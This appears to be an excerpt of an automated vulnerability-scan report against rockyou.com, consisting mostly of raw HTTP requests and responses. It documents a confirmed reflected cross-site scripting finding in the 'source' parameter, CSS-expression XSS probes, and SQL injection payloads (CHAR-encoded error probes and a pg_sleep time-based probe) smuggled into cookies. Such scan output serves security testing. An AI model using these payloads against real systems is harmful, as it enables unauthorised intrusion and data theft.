<td>
<div style="width:100px;height:100px;position:absolute;">
<!--script type="text/javascript">var likeParams = ['01078cba91618ea1','drawerbutton'];</script><script type="text/javascript" src="http://partner.like.com/likesense/rockyou.js"></script-->
</div>
</td>
</tr>
</table>
</div>
</div>
<style>
#photothumbs a:link {color:#ffffff;}
</style>
<table style="margin: 0 auto; clear:both" width="450px"><tr>
<script>
function showPagelet(p) {
document.getElementById('sharePagelet').style.display='none';
document.getElementById('ratePagelet').style.display='none';
document.getElementById(p).style.display='';
}
</script>
<td><a href="#" onclick="ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-share&value=showmygallery',null,null); showPagelet('sharePagelet'); return false;">SHARE</a></td>
<td><a href="#" onclick="showPagelet('ratePagelet'); return false;">RATE</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-makeaslideshow&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fviewpage_clickthrough.php%3Fwidget%3Dslideshow%26instanceid%3Dexpression%28netsparker%289%29%29">MAKE A SLIDESHOW</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-addtofavorites&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Faddfavorite.php%3Finstanceid%3Dexpression%28netsparker%289%29%29">ADD TO FAVORITES</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-report&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fsetinappropriate.php%3Finstanceid%3Dexpression%28netsparker%289%29%29">REPORT</a></td>
</tr></table>
<div id="ajaxarea" style="width:450px; height:100px; background: #f51768; margin: 10px auto" >
<div id=&q..
Date: Mon, 18 Apr 2011 22:40:14 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:40:13 GMT; path=/; domain=.rockyou.com,lastlogin=1303166414; expires=Wed, 27-Jul-2011 22:40:14 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:40:14 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:40:14 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:40:14 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=255942 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9796
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="js/lightbox/prototype.js" type="text/javascript"></script><script src="js/lightbox/scriptaculous.js?load=effects" type="text/javascript"></script><script src="js/lightbox/lightbox.js" type="text/javascript"></script><script src="js/embeds.js?ver=5" type="text/javascript"></script><script src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js" type="text/javascript"></script><script src="js/subscription.js?ver=2" type="text/javascript"></script><script src="/js/standard.js" type="text/javascript"></script><link href="/css/style.css" rel="stylesheet" type="text/css"><link href="/css/comment.css" rel="stylesheet" type="text/css"><link href="/css/profile.css" rel="stylesheet" type="text/css"><link href="/css/lightbox.css" rel="stylesheet" type="text/css"><link href="/css/star_rating.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> <meta name="title" content="RockYou Slideshow" />
<meta name="description" content="Check out my new photos from RockYou.com." />
<link rel="image_src" href="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" />
<link rel="video_src" href="http://apps.rockyou.com/rockyou.swf?instanceid=expression(netsparker(9))"/>
<meta name="video_height" content="320" />
<meta name="video_width" content="426" />
<meta name="video_type" content="application/x-shockwave-flash" /></HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-button" style="font-weight:bold"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-create&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fchoose_widget.php">CREATE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-browse&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Ffeaturedartists.php">BROWSE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-mystuff&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fmy_stuff.php">MY STUFF</a></div> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-login&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Log In</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-register&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Register</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png");'> <img src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" class="transparent"/> </div> </div> </div> <br>
<script type="text/javascript">
function thickBoxFrame(msg, url){
//alert(url);
url = url+'?KeepThis=true&TB_iframe=true&height=310&width=370';
TB_show('fff', 'http://www.google.com', '');
}
function getImgLink(img_src, img_cap) { var first_dot_index = img_src.indexOf('.') + 1; var rest_url = img_src.slice(first_dot_index,img_src.length); var second_dot_index = rest_url.indexOf('.'); var second_slice_index = rest_url.indexOf('/')+ first_dot_index ; var partner_name = rest_url.slice(0,second_dot_index); var partner_url = img_src; partner_url = img_src.slice(0,second_slice_index); //alert( '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\">rest_url</a>'); if (partner_name == 'badongo'){ img_src= img_src.replace('/ry/','/pic/').replace('.jpg',''); return '<a href=\"'+img_src+'\" target="_blank" title=\"'+img_cap+'\">view pic<br>('+partner_name+')</a>'; }else{ return '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\" onclick=\"ajax_post_john(\'/events/include/ajaxtrackevent.php\',\'name=rockyou-mobile&value=showmygallery\',null,null);\">view pic<br>('+partner_name+')</a>'; } }
function deleteComment(url) {
deleteme = confirm("Delete This Comment?");
if (deleteme) {
window.location=url;
}
}
function deletethis (e) {
if (!e) var e = window.event;
var tg = (e.target) ? e.target : e.srcElement
removeObj(tg.parentNode);
}
function removeObj(tr){
tr.parentNode.removeChild(tr);
}
function addtxtbox()
{
table=document.getElementById('tbltext');
mycurrent_row=document.createElement("TR");
mycurrent_cell=document.createElement("TD");
try
{
mycurrent_cell.innerHTML="<input type=\"text\" name=\"to[]\" class=\"textboxcl2\"> <input type=\"button\" value=\"Remove\" onclick=\"deletethis(event)\">";
}
catch(e)
{
mytextbox=document.createElement("INPUT");
mytextbox.setAttribute("type","text");
mytextbox.setAttribute("name","to[]");
mytextbox.setAttribute("class","textboxcl2");
mycurrent_cell.appendChild(mytextbox);
mybutton=document.createElement("INPUT");
mybutton.setAttribute("type","Button");
mybutton.setAttribute("value","Remove");
mybutton.setAttribute("onclick","alert('this')");
mycurrent_cell.appendChild(mybutton);
}
mycurrent_row.appendChild(mycurrent_cell);
table.getElementsByTagName('tbody')[0].appendChild(mycurrent_row);
}
function xmlhttpPostURL(type,data,url) {
var xmlHttpReq = false;
var self = this;
// Mozilla/Safari
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}
// IE
else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
self.xmlHttpReq.open('POST', url+"?instanceid=expression(netsparker(9))", true);
self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8");
self.xmlHttpReq.onreadystatechange = function() {
if (self.xmlHttpReq.readyState == 4) {
//alert(self.xmlHttpReq.responseXML);
notXML = false;
if (self.xmlHttpReq.responseXML)
{
//eval ("var resp = "+self.xmlHttpReq.responseText);
xmlDoc = self.xmlHttpReq.responseXML.documentElement;
if (xmlDoc)
{
var thumbClass = (navigator.appVersion.indexOf('MSIE 6') == -1) ? 'smallthumb' : 'smallthumbIE6';
imageList = xmlDoc.getElementsByTagName("image");
capList = xmlDoc.getElementsByTagName("text");
imgs = "";
if (thumbnailStart > imageList.length) thumbnailStart -= calcThumbnailsCount();
if (thumbnailStart < 0) thumbnailStart = 0;
thumbnailEnd = thumbnailStart + calcThumbnailsCount();
if (thumbnailEnd > imageList.length) thumbnailEnd = imageList.length;
for (i = 0; i < imageList.length; i++)
{
img_src = imageList[i].getAttribute("path");
img_cap = URLDecode(capList[i].getAttribute("text"));
img_link = getImgLink(img_src, img_cap);
if ((i >= thumbnailStart) && (i < thumbnailEnd)) {
imgs += "<div class='thumbwrap'>";
} else {
imgs += "<div class='thumbwrap' style='display:none'>";
}
imgs += "<a href='"+img_src+"' rel='lightbox[show]'><img src='"+img_src+"' class='"+thumbClass+"' title=\""+img_cap+"\"></a><br><img src='/images/icons/mobilephone.gif' style='margin-top:8px;margin-left:7px;cursor:pointer;float:left' onclick=\"ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-mobile&value=showmygallery',null,null); window.open('http://photofun.funmo.com/rockyou/photos/new?orig_url="+escape(img_src)+"','tomobile','width=776,height=585,status=no,toolbar=no,menubar=no,scrollbars=no,resizable=yes,location=no,directories=no,status=no');return false;\">";
imgs += img_link+"</div>";
}
document.getElementById("photothumbs").innerHTML = imgs;
initLightbox();
actionJump();
}
else
{
notXML = true;
}
}
else
{
notXML = true;
}
if (notXML)
{
eval ("var resp = "+self.xmlHttpReq.responseText);
if (resp['mode']=='vote')
{
//set new Rating and Votes
document.getElementById('current-rating').style.width=30*resp['data'][0];
document.getElementById('current-vote').innerHTML=resp['data'][1]+' Votes';
}
}
}
}
self.xmlHttpReq.send(type+"="+escape(data));
}
function URLDecode(psEncodeString)
{
var lsRegExp = /\+/g;
return unescape(String(psEncodeString).replace(lsRegExp, " "));
}
function setStartSlide(slide)
{
document.getElementById('flashsrc').innerHTML='<embed src="http://apps.rockyou.com/rockyou.swf?instanceid=expression(netsparker(9))&startSlide='+slide+'" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/>';
}
function initPage()
{
xmlhttpPostURL("1",'',"xmlproxy.php");
}
if (window.addEventListener) {
window.addEventListener('load',initPage,false);
}
else window.attachEvent('onload',initPage);
function actionJump()
{
}
function rate_vote(vote)
{
xmlhttpPostURL("vote",vote,"show_my_gallery-ajax.php");
//alert(vote);
}
function rate_display(vote)
{
var note = "";
switch (vote)
{
case 1:
note = "Total Junk";
break;
case 2:
note = "Kinda Lame";
break;
case 3:
note = "Its OK";
break;
case 4:
note = "Pretty Good";
break;
case 5:
note = "Way Hot";
break;
}
document.getElementById('ratingtitle').innerHTML=note;
}
function rate_displayout()
{
document.getElementById('ratingtitle').innerHTML = "Rate Me!";
}
</script>
<div id="container" style='width:1125px;margin:auto;padding-top:15px'>
<div style="float:left;width:800px">
<table id="photothumbscontainer" style="margin-bottom:15px;" cellpadding="0" cellspacing="0" ><tr>
<td><img src="/images/thumbnailsLeft.gif" onclick="thumbnailStart-=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
<td id="photothumbs" style="width:800px; height:94px; background:#300018; padding: 2px 0; font-size:10px; vertical-align:bottom"> </td>
<td><img src="/images/thumbnailsRight.gif" onclick="thumbnailStart+=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
</tr></table>
<div id="contentwrapper" style="float:left" >
<div id="contentcolumn" style="width:500px" align="center">
<div align="left" style="width:500px">
<div style="width:425px;margin:0 auto;border:2px solid red;background:red;text-align:center;color:white">PRIVATE SLIDESHOW</div> <div id="slideshow-container" style="width:450px; height:300px; margin:0px auto 20px; border: 1px solid #a80050">
<div id='flashsrc'>
<table cellpadding="0" cellspacing="0" border="0">
<tr valign="top">
<td><div id="embeddiv"></div></td>
<td>
<div style="width:100px;height:100px;position:absolute;">
<!--script type="text/javascript">var likeParams = ['01078cba91618ea1','drawerbutton'];</script><script type="text/javascript" src="http://partner.like.com/likesense/rockyou.js"></script-->
</div>
</td>
</tr>
</table>
</div>
</div>
<style>
#photothumbs a:link {color:#ffffff;}
</style>
<table style="margin: 0 auto; clear:both" width="450px"><tr>
<script>
function showPagelet(p) {
document.getElementById('sharePagelet').style.display='none';
document.getElementById('ratePagelet').style.display='none';
document.getElementById(p).style.display='';
}
</script>
<td><a href="#" onclick="ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-share&value=showmygallery',null,null); showPagelet('sharePagelet'); return false;">SHARE</a></td>
<td><a href="#" onclick="showPagelet('ratePagelet'); return false;">RATE</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-makeaslideshow&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fviewpage_clickthrough.php%3Fwidget%3Dslideshow%26instanceid%3Dexpression%28netsparker%289%29%29">MAKE A SLIDESHOW</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-addtofavorites&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Faddfavorite.php%3Finstanceid%3Dexpression%28netsparker%289%29%29">ADD TO FAVORITES</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-report&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fsetinappropriate.php%3Finstanceid%3Dexpression%28netsparker%289%29%29">REPORT</a></td>
</tr></table>
<div id="ajaxarea" style="width:450px; height:100px; background: #f51768; margin: 10px auto" >
<div id=&q..
|
- /slideshow-create.php
/slideshow-create.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| lang | GET | en |
| source | GET | '"--></style></script><script>alert(0x0025EC)</script> |
Request
GET /slideshow-create.php?lang=en&source='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0025EC)%3C/script%3E HTTP/1.1
Referer: http://www.rockyou.com/slideshow-create.php?source=br
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303167243; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/slideshow-create.php?source=br
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303167243; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:54:03 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:54:02 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 22:54:03 GMT; path=/; domain=.rockyou.com,lastlogin=1303167243; expires=Wed, 27-Jul-2011 22:54:03 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:54:03 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:54:03 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:54:03 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=23750 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26945
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "'"--></style></script><script>netsparker(0x0025EC)</script>";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; 